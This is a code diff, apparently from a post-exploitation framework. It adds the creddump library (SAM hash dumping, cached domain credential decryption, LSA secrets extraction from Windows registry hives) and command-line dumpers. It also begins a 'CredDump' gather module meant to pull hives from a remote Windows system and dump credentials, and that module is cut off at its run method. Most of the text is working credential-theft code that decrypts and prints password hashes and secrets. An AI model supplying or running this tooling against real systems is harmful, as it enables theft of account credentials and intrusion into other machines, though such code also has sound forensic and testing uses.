'SubKeyLists' : [ 0x1c, ['array', 2, ['unsigned long']]],
|
||||
'ValueList' : [ 0x24, ['_CHILD_LIST']],
|
||||
'ChildHiveReference' : [ 0x1c, ['_CM_KEY_REFERENCE']],
|
||||
'Security' : [ 0x2c, ['unsigned long']],
|
||||
'Class' : [ 0x30, ['unsigned long']],
|
||||
'MaxNameLen' : [ 0x34, ['unsigned long']],
|
||||
'MaxClassLen' : [ 0x38, ['unsigned long']],
|
||||
'MaxValueNameLen' : [ 0x3c, ['unsigned long']],
|
||||
'MaxValueDataLen' : [ 0x40, ['unsigned long']],
|
||||
'WorkVar' : [ 0x44, ['unsigned long']],
|
||||
'NameLength' : [ 0x48, ['unsigned short']],
|
||||
'ClassLength' : [ 0x4a, ['unsigned short']],
|
||||
'Name' : [ 0x4c, ['array', 1, ['unsigned short']]],
|
||||
} ],
|
||||
'_CM_KEY_INDEX' : [ 0x8, {
|
||||
'Signature' : [ 0x0, ['unsigned short']],
|
||||
'Count' : [ 0x2, ['unsigned short']],
|
||||
'List' : [ 0x4, ['array', 1, ['unsigned long']]],
|
||||
} ],
|
||||
'_CHILD_LIST' : [ 0x8, {
|
||||
'Count' : [ 0x0, ['unsigned long']],
|
||||
'List' : [ 0x4, ['unsigned long']],
|
||||
} ],
|
||||
}
|
|
@ -0,0 +1,135 @@
|
|||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
from rawreg import *
|
||||
from ..addrspace import HiveFileAddressSpace
|
||||
from hashdump import get_bootkey
|
||||
from lsasecrets import get_secret_by_name,get_lsa_key
|
||||
from Crypto.Hash import HMAC
|
||||
from Crypto.Cipher import ARC4, AES
|
||||
from struct import unpack
|
||||
|
||||
def get_nlkm(secaddr, lsakey, vista):
|
||||
return get_secret_by_name(secaddr, 'NL$KM', lsakey, vista)
|
||||
|
||||
def decrypt_hash(edata, nlkm, ch):
|
||||
hmac_md5 = HMAC.new(nlkm,ch)
|
||||
rc4key = hmac_md5.digest()
|
||||
|
||||
rc4 = ARC4.new(rc4key)
|
||||
data = rc4.encrypt(edata)
|
||||
return data
|
||||
|
||||
def decrypt_hash_vista(edata, nlkm, ch):
|
||||
"""
|
||||
Based on code from http://lab.mediaservice.net/code/cachedump.rb
|
||||
"""
|
||||
aes = AES.new(nlkm[16:32], AES.MODE_CBC, ch)
|
||||
|
||||
out = ""
|
||||
for i in range(0, len(edata), 16):
|
||||
buf = edata[i : i+16]
|
||||
if len(buf) < 16:
|
||||
buf += (16 - len(buf)) * "\00"
|
||||
|
||||
out += aes.decrypt(buf)
|
||||
return out
|
||||
|
||||
def parse_cache_entry(cache_data):
|
||||
(uname_len, domain_len) = unpack("<HH", cache_data[:4])
|
||||
(domain_name_len,) = unpack("<H", cache_data[60:62])
|
||||
ch = cache_data[64:80]
|
||||
enc_data = cache_data[96:]
|
||||
return (uname_len, domain_len, domain_name_len, enc_data, ch)
|
||||
|
||||
def parse_decrypted_cache(dec_data, uname_len,
|
||||
domain_len, domain_name_len):
|
||||
uname_off = 72
|
||||
pad = 2 * ( ( uname_len / 2 ) % 2 )
|
||||
domain_off = uname_off + uname_len + pad
|
||||
pad = 2 * ( ( domain_len / 2 ) % 2 )
|
||||
domain_name_off = domain_off + domain_len + pad
|
||||
|
||||
hash = dec_data[:0x10]
|
||||
username = dec_data[uname_off:uname_off+uname_len]
|
||||
username = username.decode('utf-16-le')
|
||||
domain = dec_data[domain_off:domain_off+domain_len]
|
||||
domain = domain.decode('utf-16-le')
|
||||
domain_name = dec_data[domain_name_off:domain_name_off+domain_name_len]
|
||||
domain_name = domain_name.decode('utf-16-le')
|
||||
|
||||
return (username, domain, domain_name, hash)
|
||||
|
||||
def dump_hashes(sysaddr, secaddr, vista):
|
||||
bootkey = get_bootkey(sysaddr)
|
||||
if not bootkey:
|
||||
return []
|
||||
|
||||
lsakey = get_lsa_key(secaddr, bootkey, vista)
|
||||
if not lsakey:
|
||||
return []
|
||||
|
||||
nlkm = get_nlkm(secaddr, lsakey, vista)
|
||||
if not nlkm:
|
||||
return []
|
||||
|
||||
root = get_root(secaddr)
|
||||
if not root:
|
||||
return []
|
||||
|
||||
cache = open_key(root, ["Cache"])
|
||||
if not cache:
|
||||
return []
|
||||
|
||||
hashes = []
|
||||
for v in values(cache):
|
||||
if v.Name == "NL$Control": continue
|
||||
|
||||
data = v.space.read(v.Data.value, v.DataLength.value)
|
||||
|
||||
(uname_len, domain_len, domain_name_len,
|
||||
enc_data, ch) = parse_cache_entry(data)
|
||||
|
||||
# Skip if nothing in this cache entry
|
||||
if uname_len == 0:
|
||||
continue
|
||||
|
||||
if vista:
|
||||
dec_data = decrypt_hash_vista(enc_data, nlkm, ch)
|
||||
else:
|
||||
dec_data = decrypt_hash(enc_data, nlkm, ch)
|
||||
|
||||
|
||||
(username, domain, domain_name,
|
||||
hash) = parse_decrypted_cache(dec_data, uname_len,
|
||||
domain_len, domain_name_len)
|
||||
|
||||
hashes.append((username, domain, domain_name, hash))
|
||||
|
||||
return hashes
|
||||
|
||||
def dump_file_hashes(syshive_fname, sechive_fname, vista):
|
||||
sysaddr = HiveFileAddressSpace(syshive_fname)
|
||||
secaddr = HiveFileAddressSpace(sechive_fname)
|
||||
|
||||
for (u, d, dn, hash) in dump_hashes(sysaddr, secaddr, vista):
|
||||
print "%s:%s:%s:%s" % (u.lower(), hash.encode('hex'),
|
||||
d.lower(), dn.lower())
|
|
@ -0,0 +1,236 @@
|
|||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
from rawreg import *
|
||||
from ..addrspace import HiveFileAddressSpace
|
||||
from Crypto.Hash import MD5
|
||||
from Crypto.Cipher import ARC4,DES
|
||||
from struct import unpack,pack
|
||||
|
||||
odd_parity = [
|
||||
1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
|
||||
16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
|
||||
32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
|
||||
49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
|
||||
64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
|
||||
81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
|
||||
97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
|
||||
112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
|
||||
128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
|
||||
145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
|
||||
161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
|
||||
176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
|
||||
193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
|
||||
208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
|
||||
224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
|
||||
241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
|
||||
]
|
||||
|
||||
# Permutation matrix for boot key
|
||||
p = [ 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3,
|
||||
0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 ]
|
||||
|
||||
# Constants for SAM decrypt algorithm
|
||||
aqwerty = "!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
|
||||
anum = "0123456789012345678901234567890123456789\0"
|
||||
antpassword = "NTPASSWORD\0"
|
||||
almpassword = "LMPASSWORD\0"
|
||||
|
||||
empty_lm = "aad3b435b51404eeaad3b435b51404ee".decode('hex')
|
||||
empty_nt = "31d6cfe0d16ae931b73c59d7e0c089c0".decode('hex')
|
||||
|
||||
def str_to_key(s):
|
||||
key = []
|
||||
key.append( ord(s[0])>>1 )
|
||||
key.append( ((ord(s[0])&0x01)<<6) | (ord(s[1])>>2) )
|
||||
key.append( ((ord(s[1])&0x03)<<5) | (ord(s[2])>>3) )
|
||||
key.append( ((ord(s[2])&0x07)<<4) | (ord(s[3])>>4) )
|
||||
key.append( ((ord(s[3])&0x0F)<<3) | (ord(s[4])>>5) )
|
||||
key.append( ((ord(s[4])&0x1F)<<2) | (ord(s[5])>>6) )
|
||||
key.append( ((ord(s[5])&0x3F)<<1) | (ord(s[6])>>7) )
|
||||
key.append( ord(s[6])&0x7F )
|
||||
for i in range(8):
|
||||
key[i] = (key[i]<<1)
|
||||
key[i] = odd_parity[key[i]]
|
||||
return "".join(chr(k) for k in key)
|
||||
|
||||
def sid_to_key(sid):
|
||||
s1 = ""
|
||||
s1 += chr(sid & 0xFF)
|
||||
s1 += chr((sid>>8) & 0xFF)
|
||||
s1 += chr((sid>>16) & 0xFF)
|
||||
s1 += chr((sid>>24) & 0xFF)
|
||||
s1 += s1[0];
|
||||
s1 += s1[1];
|
||||
s1 += s1[2];
|
||||
s2 = s1[3] + s1[0] + s1[1] + s1[2]
|
||||
s2 += s2[0] + s2[1] + s2[2]
|
||||
|
||||
return str_to_key(s1),str_to_key(s2)
|
||||
|
||||
def find_control_set(sysaddr):
|
||||
root = get_root(sysaddr)
|
||||
if not root:
|
||||
return 1
|
||||
|
||||
csselect = open_key(root, ["Select"])
|
||||
if not csselect:
|
||||
return 1
|
||||
|
||||
for v in values(csselect):
|
||||
if v.Name == "Current": return v.Data.value
|
||||
|
||||
def get_bootkey(sysaddr):
|
||||
cs = find_control_set(sysaddr)
|
||||
lsa_base = ["ControlSet%03d" % cs, "Control", "Lsa"]
|
||||
lsa_keys = ["JD","Skew1","GBG","Data"]
|
||||
|
||||
root = get_root(sysaddr)
|
||||
if not root: return None
|
||||
|
||||
lsa = open_key(root, lsa_base)
|
||||
if not lsa: return None
|
||||
|
||||
bootkey = ""
|
||||
|
||||
for lk in lsa_keys:
|
||||
key = open_key(lsa, [lk])
|
||||
class_data = sysaddr.read(key.Class.value, key.ClassLength.value)
|
||||
bootkey += class_data.decode('utf-16-le').decode('hex')
|
||||
|
||||
bootkey_scrambled = ""
|
||||
for i in range(len(bootkey)):
|
||||
bootkey_scrambled += bootkey[p[i]]
|
||||
|
||||
return bootkey_scrambled
|
||||
|
||||
def get_hbootkey(samaddr, bootkey):
|
||||
sam_account_path = ["SAM", "Domains", "Account"]
|
||||
|
||||
root = get_root(samaddr)
|
||||
if not root: return None
|
||||
|
||||
sam_account_key = open_key(root, sam_account_path)
|
||||
if not sam_account_key: return None
|
||||
|
||||
F = None
|
||||
for v in values(sam_account_key):
|
||||
if v.Name == 'F':
|
||||
F = samaddr.read(v.Data.value, v.DataLength.value)
|
||||
if not F: return None
|
||||
|
||||
md5 = MD5.new()
|
||||
md5.update(F[0x70:0x80] + aqwerty + bootkey + anum)
|
||||
rc4_key = md5.digest()
|
||||
|
||||
rc4 = ARC4.new(rc4_key)
|
||||
hbootkey = rc4.encrypt(F[0x80:0xA0])
|
||||
|
||||
return hbootkey
|
||||
|
||||
def get_user_keys(samaddr):
|
||||
user_key_path = ["SAM", "Domains", "Account", "Users"]
|
||||
|
||||
root = get_root(samaddr)
|
||||
if not root: return []
|
||||
|
||||
user_key = open_key(root, user_key_path)
|
||||
if not user_key: return []
|
||||
|
||||
return [k for k in subkeys(user_key) if k.Name != "Names"]
|
||||
|
||||
def decrypt_single_hash(rid, hbootkey, enc_hash, lmntstr):
|
||||
(des_k1,des_k2) = sid_to_key(rid)
|
||||
d1 = DES.new(des_k1, DES.MODE_ECB)
|
||||
d2 = DES.new(des_k2, DES.MODE_ECB)
|
||||
|
||||
md5 = MD5.new()
|
||||
md5.update(hbootkey[:0x10] + pack("<L",rid) + lmntstr)
|
||||
rc4_key = md5.digest()
|
||||
rc4 = ARC4.new(rc4_key)
|
||||
obfkey = rc4.encrypt(enc_hash)
|
||||
hash = d1.decrypt(obfkey[:8]) + d2.decrypt(obfkey[8:])
|
||||
|
||||
return hash
|
||||
|
||||
def decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey):
|
||||
# LM Hash
|
||||
if enc_lm_hash:
|
||||
lmhash = decrypt_single_hash(rid, hbootkey, enc_lm_hash, almpassword)
|
||||
else:
|
||||
lmhash = ""
|
||||
|
||||
# NT Hash
|
||||
if enc_nt_hash:
|
||||
nthash = decrypt_single_hash(rid, hbootkey, enc_nt_hash, antpassword)
|
||||
else:
|
||||
nthash = ""
|
||||
|
||||
return lmhash,nthash
|
||||
|
||||
def get_user_hashes(user_key, hbootkey):
|
||||
samaddr = user_key.space
|
||||
rid = int(user_key.Name, 16)
|
||||
V = None
|
||||
for v in values(user_key):
|
||||
if v.Name == 'V':
|
||||
V = samaddr.read(v.Data.value, v.DataLength.value)
|
||||
if not V: return None
|
||||
|
||||
hash_offset = unpack("<L", V[0x9c:0x9c+4])[0] + 0xCC
|
||||
|
||||
lm_exists = True if unpack("<L", V[0x9c+4:0x9c+8])[0] == 20 else False
|
||||
nt_exists = True if unpack("<L", V[0x9c+16:0x9c+20])[0] == 20 else False
|
||||
|
||||
enc_lm_hash = V[hash_offset+4:hash_offset+20] if lm_exists else ""
|
||||
enc_nt_hash = V[hash_offset+(24 if lm_exists else 8):hash_offset+(24 if lm_exists else 8)+16] if nt_exists else ""
|
||||
|
||||
return decrypt_hashes(rid, enc_lm_hash, enc_nt_hash, hbootkey)
|
||||
|
||||
def get_user_name(user_key):
|
||||
samaddr = user_key.space
|
||||
V = None
|
||||
for v in values(user_key):
|
||||
if v.Name == 'V':
|
||||
V = samaddr.read(v.Data.value, v.DataLength.value)
|
||||
if not V: return None
|
||||
|
||||
name_offset = unpack("<L", V[0x0c:0x10])[0] + 0xCC
|
||||
name_length = unpack("<L", V[0x10:0x14])[0]
|
||||
|
||||
username = V[name_offset:name_offset+name_length].decode('utf-16-le')
|
||||
return username
|
||||
|
||||
def dump_hashes(sysaddr, samaddr):
|
||||
bootkey = get_bootkey(sysaddr)
|
||||
hbootkey = get_hbootkey(samaddr,bootkey)
|
||||
|
||||
for user in get_user_keys(samaddr):
|
||||
lmhash,nthash = get_user_hashes(user,hbootkey)
|
||||
if not lmhash: lmhash = empty_lm
|
||||
if not nthash: nthash = empty_nt
|
||||
print "%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name,16),
|
||||
lmhash.encode('hex'), nthash.encode('hex'))
|
||||
|
||||
def dump_file_hashes(syshive_fname, samhive_fname):
|
||||
sysaddr = HiveFileAddressSpace(syshive_fname)
|
||||
samaddr = HiveFileAddressSpace(samhive_fname)
|
||||
dump_hashes(sysaddr, samaddr)
|
|
@ -0,0 +1,171 @@
|
|||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
from rawreg import *
|
||||
from ..addrspace import HiveFileAddressSpace
|
||||
from hashdump import get_bootkey,str_to_key
|
||||
from Crypto.Hash import MD5, SHA256
|
||||
from Crypto.Cipher import ARC4,DES, AES
|
||||
|
||||
def get_lsa_key(secaddr, bootkey, vista):
|
||||
root = get_root(secaddr)
|
||||
if not root:
|
||||
return None
|
||||
|
||||
if vista:
|
||||
enc_reg_key = open_key(root, ["Policy", "PolEKList"])
|
||||
else:
|
||||
enc_reg_key = open_key(root, ["Policy", "PolSecretEncryptionKey"])
|
||||
|
||||
if not enc_reg_key:
|
||||
return None
|
||||
|
||||
enc_reg_value = enc_reg_key.ValueList.List[0]
|
||||
if not enc_reg_value:
|
||||
return None
|
||||
|
||||
obf_lsa_key = secaddr.read(enc_reg_value.Data.value,
|
||||
enc_reg_value.DataLength.value)
|
||||
if not obf_lsa_key:
|
||||
return None
|
||||
|
||||
if not vista:
|
||||
md5 = MD5.new()
|
||||
md5.update(bootkey)
|
||||
for i in range(1000):
|
||||
md5.update(obf_lsa_key[60:76])
|
||||
rc4key = md5.digest()
|
||||
rc4 = ARC4.new(rc4key)
|
||||
lsa_key = rc4.decrypt(obf_lsa_key[12:60])
|
||||
lsa_key = lsa_key[0x10:0x20]
|
||||
else:
|
||||
lsa_key = decrypt_aes(obf_lsa_key, bootkey)
|
||||
lsa_key = lsa_key[68:100]
|
||||
|
||||
return lsa_key
|
||||
|
||||
def decrypt_secret(secret, key):
|
||||
"""Python implementation of SystemFunction005.
|
||||
|
||||
Decrypts a block of data with DES using given key.
|
||||
Note that key can be longer than 7 bytes."""
|
||||
decrypted_data = ''
|
||||
j = 0 # key index
|
||||
for i in range(0,len(secret),8):
|
||||
enc_block = secret[i:i+8]
|
||||
block_key = key[j:j+7]
|
||||
des_key = str_to_key(block_key)
|
||||
|
||||
des = DES.new(des_key, DES.MODE_ECB)
|
||||
decrypted_data += des.decrypt(enc_block)
|
||||
|
||||
j += 7
|
||||
if len(key[j:j+7]) < 7:
|
||||
j = len(key[j:j+7])
|
||||
|
||||
(dec_data_len,) = unpack("<L", decrypted_data[:4])
|
||||
return decrypted_data[8:8+dec_data_len]
|
||||
|
||||
def decrypt_aes(secret, key):
|
||||
sha = SHA256.new()
|
||||
sha.update(key)
|
||||
for _i in range(1, 1000+1):
|
||||
sha.update(secret[28:60])
|
||||
aeskey = sha.digest()
|
||||
|
||||
data = ""
|
||||
for i in range(60, len(secret), 16):
|
||||
aes = AES.new(aeskey, AES.MODE_CBC, "\x00"*16)
|
||||
buf = secret[i : i + 16]
|
||||
if len(buf) < 16:
|
||||
buf += (16-len(buf)) * "\00"
|
||||
|
||||
data += aes.decrypt(buf)
|
||||
|
||||
return data
|
||||
|
||||
|
||||
def get_secret_by_name(secaddr, name, lsakey, vista):
|
||||
root = get_root(secaddr)
|
||||
if not root:
|
||||
return None
|
||||
|
||||
enc_secret_key = open_key(root, ["Policy", "Secrets", name, "CurrVal"])
|
||||
if not enc_secret_key:
|
||||
return None
|
||||
|
||||
enc_secret_value = enc_secret_key.ValueList.List[0]
|
||||
if not enc_secret_value:
|
||||
return None
|
||||
|
||||
enc_secret = secaddr.read(enc_secret_value.Data.value,
|
||||
enc_secret_value.DataLength.value)
|
||||
if not enc_secret:
|
||||
return None
|
||||
|
||||
if vista:
|
||||
secret = decrypt_aes(enc_secret, lsakey)
|
||||
else:
|
||||
secret = decrypt_secret(enc_secret[0xC:], lsakey)
|
||||
|
||||
return secret
|
||||
|
||||
def get_secrets(sysaddr, secaddr, vista):
|
||||
root = get_root(secaddr)
|
||||
if not root:
|
||||
return None
|
||||
|
||||
bootkey = get_bootkey(sysaddr)
|
||||
lsakey = get_lsa_key(secaddr, bootkey, vista)
|
||||
|
||||
secrets_key = open_key(root, ["Policy", "Secrets"])
|
||||
if not secrets_key:
|
||||
return None
|
||||
|
||||
secrets = {}
|
||||
for key in subkeys(secrets_key):
|
||||
sec_val_key = open_key(key, ["CurrVal"])
|
||||
if not sec_val_key:
|
||||
continue
|
||||
|
||||
enc_secret_value = sec_val_key.ValueList.List[0]
|
||||
if not enc_secret_value:
|
||||
continue
|
||||
|
||||
enc_secret = secaddr.read(enc_secret_value.Data.value,
|
||||
enc_secret_value.DataLength.value)
|
||||
if not enc_secret:
|
||||
continue
|
||||
|
||||
if vista:
|
||||
secret = decrypt_aes(enc_secret, lsakey)
|
||||
else:
|
||||
secret = decrypt_secret(enc_secret[0xC:], lsakey)
|
||||
|
||||
secrets[key.Name] = secret
|
||||
|
||||
return secrets
|
||||
|
||||
def get_file_secrets(sysfile, secfile, vista):
|
||||
sysaddr = HiveFileAddressSpace(sysfile)
|
||||
secaddr = HiveFileAddressSpace(secfile)
|
||||
|
||||
return get_secrets(sysaddr, secaddr, vista)
|
|
@ -0,0 +1,73 @@
|
|||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
from ..newobj import Obj,Pointer
|
||||
from struct import unpack
|
||||
|
||||
ROOT_INDEX = 0x20
|
||||
LH_SIG = unpack("<H","lh")[0]
|
||||
LF_SIG = unpack("<H","lf")[0]
|
||||
RI_SIG = unpack("<H","ri")[0]
|
||||
|
||||
def get_root(address_space):
|
||||
return Obj("_CM_KEY_NODE", ROOT_INDEX, address_space)
|
||||
|
||||
def open_key(root, key):
|
||||
if key == []:
|
||||
return root
|
||||
|
||||
keyname = key.pop(0)
|
||||
for s in subkeys(root):
|
||||
if s.Name.upper() == keyname.upper():
|
||||
return open_key(s, key)
|
||||
print "ERR: Couldn't find subkey %s of %s" % (keyname, root.Name)
|
||||
return None
|
||||
|
||||
def subkeys(key,stable=True):
|
||||
if stable: k = 0
|
||||
else: k = 1
|
||||
sk = (key.SubKeyLists[k]/["pointer", ["_CM_KEY_INDEX"]]).value
|
||||
sub_list = []
|
||||
if (sk.Signature.value == LH_SIG or
|
||||
sk.Signature.value == LF_SIG):
|
||||
sub_list = sk.List
|
||||
elif sk.Signature.value == RI_SIG:
|
||||
lfs = []
|
||||
for i in range(sk.Count.value):
|
||||
off,tp = sk.get_offset(['List', i])
|
||||
lfs.append(Pointer("pointer", sk.address+off, sk.space,
|
||||
["_CM_KEY_INDEX"]))
|
||||
for lf in lfs:
|
||||
sub_list += lf.List
|
||||
|
||||
for s in sub_list:
|
||||
if s.is_valid() and s.Signature.value == 27502:
|
||||
yield s.value
|
||||
|
||||
def values(key):
|
||||
for v in key.ValueList.List:
|
||||
yield v.value
|
||||
|
||||
def walk(root):
|
||||
for k in subkeys(root):
|
||||
yield k
|
||||
for j in walk(k):
|
||||
yield j
|
|
@ -0,0 +1,63 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
import sys
|
||||
from framework.win32.lsasecrets import get_file_secrets
|
||||
|
||||
# Hex dump code from
|
||||
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812
|
||||
|
||||
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
|
||||
|
||||
def showUsage():
|
||||
print "usage: %s <system hive> <security hive> <Vista/7>" % sys.argv[0]
|
||||
print "\nExample (Windows Vista/7):"
|
||||
print "%s /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true" % sys.argv[0]
|
||||
print "\nExample (Windows XP):"
|
||||
print "%s /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false" % sys.argv[0]
|
||||
|
||||
|
||||
def dump(src, length=8):
|
||||
N=0; result=''
|
||||
while src:
|
||||
s,src = src[:length],src[length:]
|
||||
hexa = ' '.join(["%02X"%ord(x) for x in s])
|
||||
s = s.translate(FILTER)
|
||||
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
|
||||
N+=length
|
||||
return result
|
||||
|
||||
if len(sys.argv) < 4 or sys.argv[3] not in ["true", "false"]:
|
||||
showUsage()
|
||||
sys.exit(1)
|
||||
else:
|
||||
vista = True if sys.argv[3] == "true" else False
|
||||
|
||||
secrets = get_file_secrets(sys.argv[1], sys.argv[2], vista)
|
||||
if not secrets:
|
||||
print "Unable to read LSA secrets. Perhaps you provided invalid hive files?"
|
||||
sys.exit(1)
|
||||
|
||||
for k in secrets:
|
||||
print k
|
||||
print dump(secrets[k], length=16)
|
|
@ -0,0 +1,31 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
# This file is part of creddump.
|
||||
#
|
||||
# creddump is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# creddump is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with creddump. If not, see <http://www.gnu.org/licenses/>.
|
||||
|
||||
"""
|
||||
@author: Brendan Dolan-Gavitt
|
||||
@license: GNU General Public License 2.0 or later
|
||||
@contact: bdolangavitt@wesleyan.edu
|
||||
"""
|
||||
|
||||
import sys
|
||||
from framework.win32.hashdump import dump_file_hashes
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
print "usage: %s <system hive> <SAM hive>" % sys.argv[0]
|
||||
sys.exit(1)
|
||||
|
||||
dump_file_hashes(sys.argv[1], sys.argv[2])
|
|
@ -0,0 +1,141 @@
|
|||
# -*- coding: UTF8 -*-
|
||||
|
||||
# Author: DeveloppSoft - developpsoft.github.io
|
||||
|
||||
# Changelogs:
|
||||
# 26 May 2016
|
||||
# init (not working, 'System' process block the download of the hives...
|
||||
#
|
||||
# 28 May 2016
|
||||
# save the hives with 'reg save' before downloading
|
||||
|
||||
# TODO
|
||||
# saves the hives with a random name
|
||||
# do not write the saves on the target
|
||||
|
||||
from pupylib.PupyModule import *
|
||||
from pupylib.PupyCompleter import *
|
||||
|
||||
from modules.lib.utils.shell_exec import shell_exec
|
||||
|
||||
from rpyc.utils.classic import download
|
||||
|
||||
import os
|
||||
import os.path
|
||||
import ntpath
|
||||
|
||||
# CredDump imports
|
||||
from modules.lib.windows.creddump.win32.domcachedump import dump_hashes
|
||||
from modules.lib.windows.creddump.addrspace import HiveFileAddressSpace
|
||||
from modules.lib.windows.creddump.win32.hashdump import get_bootkey, get_hbootkey
|
||||
from modules.lib.windows.creddump.win32.hashdump import get_user_hashes, get_user_keys, get_user_name
|
||||
from modules.lib.windows.creddump.win32.hashdump import empty_lm, empty_nt
|
||||
from modules.lib.windows.creddump.win32.lsasecrets import get_file_secrets
|
||||
|
||||
__class_name__="CredDump"
|
||||
|
||||
@config(cat="gather", compatibilities=["windows"], tags=['creds',
|
||||
'credentials', 'password', 'gather', 'hives'])
|
||||
class CredDump(PupyModule):
|
||||
|
||||
""" download the hives from a remote windows system and dump creds """
|
||||
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog='hive', description=self.__doc__)
|
||||
self.arg_parser.add_argument('--vista', action='store_true',
|
||||
dest='vista', help='is the session a Vista/7 system?')
|
||||
|
||||
def run(self, args):
|
||||
# First, we download the hives...
|
||||
